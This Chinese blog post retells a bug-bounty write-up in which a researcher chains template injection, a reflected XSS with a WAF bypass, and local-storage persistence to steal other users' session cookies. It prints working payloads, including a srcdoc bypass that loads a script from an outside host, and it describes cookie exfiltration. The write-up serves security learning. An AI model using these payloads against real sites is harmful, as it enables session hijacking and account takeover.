背景介绍：

本文为国外白帽子通过利用XSS以及WAF绕过，配合SSTI从而实现任意用户会话劫持。废话不多说，进入正题！

发现过程：

挖掘过程像往常一样，开启Burp Suite并浏览所有网站链接，没一会儿就发现了一处URL：

https://example.com?redirect=${redirectURL}

这个重定向显然是某种未正确执行的模版语言表达式，注意到这一点，迅速切换到用户配置页面，并开始尝试更改用户名。

首先是数学表达式${2*2}来确定是否存在模版注入漏洞，成功在响应包中收到“4”，看来确实存在模版注入漏洞。那么这个漏洞能用来做什么呢？

经过一段时间的尝试和分析后，发现使用 ${header.cookie} 可以获得当前用户的所有Cookie列表。

那么现在有了带有Cookie信息和SSTI漏洞后，怎样能够实现劫持其它用户呢？答案只能是“XSS”了。

我们需要拥有一个XSS漏洞，利用XSS漏洞可以将受害者的名称更改为 ${header.cookie}，然后将 Cookie 转发到攻击者的服务器上就可以了。

说起来简单，做起来可一点不轻松。经过漫长的寻找和挖掘，终于在一处参数为 videoId=w6exeqbemte 的URL上看到了“希望”。

首先尝试在URL末尾添加Payloads：

https://example.com/videos/?videoId=w6exeqbemteqwe‘"<X</

视频没有加载，检查源码发现videoId参数直接注入到了src属性中的，如下：</p> <p><iframe src="w6exeqbemteqwe’" <X</"></p> <p>这是个好兆头！那么接下来再换个Payload看看：</p> <p>?videoId=qwe"><img src onerror=alert(1)></p> <p>很遗憾，直接被WAF给拦截了。经过一系列的尝试，基本所有通用的Payloads都被一一拦截！</p> <p>接下来的几天，试着将Payloads放在iframe中，并且尽可能不覆盖src属性， onload onmouseover 同样被WAF拦截。但是 srcdoc 并没有被WAF拦截。</p> <p>那么接下来就是围绕 srcdoc 的利用了！继续尝试：</p> <p>?videoId=qwe"srcdoc="\u003ce<script%26Tab;e>"</p> <p>成功绕过WAF。</p> <p>Payload的第一部分\u003ce通过伪造打开一个不存在的标记<e来欺骗 WAF，WAF 会先对所有内容进行解码，然后再执行检查，在上面的例子中，WAF 会将 Unicode 文本转换为<e 进行检查，但实际上，它仍然是"\u003ce"文本，因此不会干扰影响后面的脚本执行。</p> <p>Payload的第二部分 %26Tab;e(&Tab;) 来欺骗 WAF 我们没有使用脚本，而是使用其它内容。</p> <p>有时，可以用空格和另一个属性（如 <script x>）来分隔单词和结尾括号，从而绕过此类 WAF，但是，这种方法在这里不起作用。因此，需要在它们之间添加了一个编码制表符 &Tab;来代替空格。形成最终Payload：</p> <p>qwe"srcdoc="\u003ce<script%26Tab;src=//dom.xss>\u003ce</script%26Tab;e></p> <p>你以为这就结束了吗？为了能够将反射型XSS转换为存储型XSS，不仅针对登录用户，还要针对注销用户，因此还需要利用缓存中毒攻击，即在服务器缓存中存储 XSS，也可以是基于 Cookie/Local Storage 的存储XSS，即利用 XSS 来覆盖 Cookie 或本地存储值，这些值如果没有经过有效过滤处理，就会被加以利用。</p> <p>因此国外白帽子又花了几分钟时间从本地存储中找到了一个未经过滤的值，并且所有用户都可以访问该值，即使是当前已注销的用户，然后更新了 JavaScript 代码，并在本地存储中加入了一个Payload。这个Payload会执行一个循环，检查用户是否有活动会话，一旦有活动会话便会启动 Cookie 外传。</p> <p>然后就是写漏洞报告，附上详细的PoC和演示视频并提交。最终在4-6个工作日后，成功获得2500美金的赏金奖励。</p> <p>感谢阅读，如果你觉得有帮助的话，欢迎分享给更多喜爱的小伙伴～</p> <div class="clear"></div> </div> </div> <div class="entry-footer group"> <p class="post-tags"><span>标签：</span> <a href="https://gugesay.com/archives/tag/xss" rel="tag">XSS</a></p> <div class="clear"></div> <h4 class="heading"> <i class="fas fa-hand-point-right"></i>您可能还喜欢...</h4> <ul class="related-posts group"> <li class="related"> <article class="related-post"> <div class="related-thumbnail"> <a href="https://gugesay.com/archives/2431"> <img width="520" height="293" src="https://gugesay.com/wp-content/uploads/2024/04/1_MKkY_q9uN1K1r4nUmzpGDQ-520x293.png?v=1713427320" class="attachment-dashscroll-medium size-dashscroll-medium wp-post-image" alt="" decoding="async" srcset="https://gugesay.com/wp-content/uploads/2024/04/1_MKkY_q9uN1K1r4nUmzpGDQ-520x293.png?v=1713427320 520w, https://gugesay.com/wp-content/uploads/2024/04/1_MKkY_q9uN1K1r4nUmzpGDQ-670x377.png?v=1713427320 670w" sizes="(max-width: 520px) 100vw, 520px" /> </a> </div> <div class="related-inner"> <h4 class="related-title"> <a href="https://gugesay.com/archives/2431" rel="bookmark">凭借一手Apple 存储XSS赚取5000美元的故事</a> </h4> </div> </article> </li> <li class="related"> <article class="related-post"> <div class="related-thumbnail"> <a href="https://gugesay.com/archives/882"> <img width="520" height="293" src="https://gugesay.com/wp-content/uploads/2023/08/wxsync-2023-08-1cf786b9ec3749ef4ec6382113d4632b-520x293.webp" class="attachment-dashscroll-medium size-dashscroll-medium wp-post-image" alt="" decoding="async" srcset="https://gugesay.com/wp-content/uploads/2023/08/wxsync-2023-08-1cf786b9ec3749ef4ec6382113d4632b-520x293.webp 520w, https://gugesay.com/wp-content/uploads/2023/08/wxsync-2023-08-1cf786b9ec3749ef4ec6382113d4632b-670x377.webp 670w" sizes="(max-width: 520px) 100vw, 520px" /> </a> </div> <div class="related-inner"> <h4 class="related-title"> <a href="https://gugesay.com/archives/882" rel="bookmark">Swagger-UI 从XSS到账户接管</a> </h4> </div> </article> </li> <li class="related"> <article class="related-post"> <div class="related-thumbnail"> <a href="https://gugesay.com/archives/656"> <img width="520" height="293" src="https://gugesay.com/wp-content/uploads/2023/08/wxsync-2023-08-1cd305256ab59c48dfa1e04adb7ca862-520x293.png" class="attachment-dashscroll-medium size-dashscroll-medium wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://gugesay.com/wp-content/uploads/2023/08/wxsync-2023-08-1cd305256ab59c48dfa1e04adb7ca862-520x293.png 520w, https://gugesay.com/wp-content/uploads/2023/08/wxsync-2023-08-1cd305256ab59c48dfa1e04adb7ca862-670x377.png 670w" sizes="(max-width: 520px) 100vw, 520px" /> </a> </div> <div class="related-inner"> <h4 class="related-title"> <a href="https://gugesay.com/archives/656" rel="bookmark">利用Param Miner挖掘基于缓存中毒的XSS漏洞</a> </h4> </div> </article> </li> </ul> <div id="comments" class="themeform">  <div id="respond" class="comment-respond"> <h3 id="reply-title" class="comment-reply-title">发表回复 <small><a rel="nofollow" id="cancel-comment-reply-link" href="/archives/307#respond" style="display:none;">取消回复</a></small></h3><p class="must-log-in">要发表评论，您必须先<a href="https://gugesay.com/%e7%99%bb%e5%85%a5?redirect_to=https%3A%2F%2Fgugesay.com%2Farchives%2F307">登录</a>。</p> </div> </div> </div> </div> </article> </div> </div> <div id="move-sidebar-content"></div> </div> <footer id="footer"> <div id="footer-bottom"> <a id="back-to-top" href="#"><i class="fas fa-angle-up"></i></a> <div class="pad group"> <div class="grid one-full"> <div id="copyright"> <p>Guge's Blog © 2024. 版权所有。</p> </div> <div id="credit">  </div> </div> <div class="grid one-full"> </div> </div> </div> </footer> </div> </div> </div> <script type="text/javascript" id="ez-toc-scroll-scriptjs-js-extra"> /* <![CDATA[ */ var eztoc_smooth_local = {"scroll_offset":"30","add_request_uri":""}; /* ]]> */ </script> <script type="text/javascript" src="https://gugesay.com/wp-content/plugins/easy-table-of-contents/assets/js/smooth_scroll.min.js?ver=2.0.65" id="ez-toc-scroll-scriptjs-js"></script> <script type="text/javascript" src="https://gugesay.com/wp-content/plugins/easy-table-of-contents/vendor/js-cookie/js.cookie.min.js?ver=2.2.1" id="ez-toc-js-cookie-js"></script> <script type="text/javascript" src="https://gugesay.com/wp-content/plugins/easy-table-of-contents/vendor/sticky-kit/jquery.sticky-kit.min.js?ver=1.9.2" id="ez-toc-jquery-sticky-kit-js"></script> <script type="text/javascript" id="ez-toc-js-js-extra"> /* <![CDATA[ */ var ezTOC = {"smooth_scroll":"1","visibility_hide_by_default":"1","scroll_offset":"30","fallbackIcon":"<span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span>"}; /* ]]> */ </script> <script type="text/javascript" src="https://gugesay.com/wp-content/plugins/easy-table-of-contents/assets/js/front.min.js?ver=2.0.65-1712968617" id="ez-toc-js-js"></script> <script type="text/javascript" src="https://gugesay.com/wp-content/themes/dashscroll/js/jquery.fitvids.js?ver=6.5.3" id="dashscroll-fitvids-js"></script> <script type="text/javascript" src="https://gugesay.com/wp-content/themes/dashscroll/js/scripts.js?ver=6.5.3" id="dashscroll-scripts-js"></script> <script type="text/javascript" src="https://gugesay.com/wp-includes/js/comment-reply.min.js?ver=6.5.3" id="comment-reply-js" async="async" data-wp-strategy="async"></script> <script type="text/javascript" src="https://gugesay.com/wp-includes/js/clipboard.min.js?ver=2.0.11" id="clipboard-js"></script> <script type="text/javascript" src="https://gugesay.com/wp-content/plugins/wp-githuber-md/assets/vendor/emojify/js/emojify.min.js?ver=1.1.0" id="emojify-js"></script> <script type="text/javascript" src="https://gugesay.com/wp-content/themes/dashscroll/js/nav.js?ver=1691571110" id="dashscroll-nav-script-js"></script> <script id="preference-link-target"> (function($) { $(function() { $(".post").find("a").each(function() { var link_href = $(this).attr("href"); if (link_href.indexOf("#") == -1) { $(this).attr("target", "_blank"); } }); }); })(jQuery); </script> <script> /(trident|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&&(/^(?:a|select|input|button|textarea)$/i.test(t.tagName)||(t.tabIndex=-1),t.focus())},!1); </script> <script id="module-prism-line-number"> (function($) { $(function() { $("code").each(function() { var parent_div = $(this).parent("pre"); var pre_css = $(this).attr("class"); if (typeof pre_css !== "undefined" && -1 !== pre_css.indexOf("language-")) { parent_div.addClass("line-numbers"); } }); }); })(jQuery); </script> <script id="module-clipboard"> (function($) { $(function() { var pre = document.getElementsByTagName("pre"); var pasteContent = document.getElementById("paste-content"); var hasLanguage = false; for (var i = 0; i < pre.length; i++) { var codeClass = pre[i].children[0].className; var isLanguage = codeClass.indexOf("language-"); var excludedCodeClassNames = [ "language-katex", "language-seq", "language-sequence", "language-flow", "language-flowchart", "language-mermaid", ]; var isExcluded = excludedCodeClassNames.indexOf(codeClass); if (isExcluded !== -1) { isLanguage = -1; } if (isLanguage !== -1) { var current_pre = pre[i]; var parent = current_pre.parentNode; var div = document.createElement("div"); div.style['position'] = 'relative'; parent.replaceChild(div, current_pre); var button = document.createElement("button"); button.className = "copy-button"; button.textContent = "Copy"; div.appendChild(current_pre); div.appendChild(button); hasLanguage = true; } }; if (hasLanguage) { var copyCode = new ClipboardJS(".copy-button", { target: function(trigger) { return trigger.previousElementSibling; } }); copyCode.on("success", function(event) { event.clearSelection(); event.trigger.textContent = "Copied"; window.setTimeout(function() { event.trigger.textContent = "Copy"; }, 2000); }); } }); })(jQuery); </script> <script id="module-emojify"> (function($) { $(function() { if (typeof emojify !== "undefined") { emojify.setConfig({ img_dir: "https://gugesay.com/wp-content/plugins/wp-githuber-md/assets/vendor/emojify/images", blacklist: { "classes": ["no-emojify"], "elements": ["script", "textarea", "pre", "code"] } }); emojify.run(); } else { console.log("[wp-githuber-md] emogify is undefined."); } }); })(jQuery); </script> <script type="text/javascript" id="slb_context">/* <![CDATA[ */if ( !!window.jQuery ) {(function($){$(document).ready(function(){if ( !!window.SLB ) { {$.extend(SLB, {"context":["public","user_guest"]});} }})})(jQuery);}/* ]]> */</script> </body> </html>

微信公众号

博客动态

热门文章

友情链接

白帽故事 · 2023年8月12日 0

通过链式攻击劫持会话获得$2500奖励

背景介绍：

发现过程：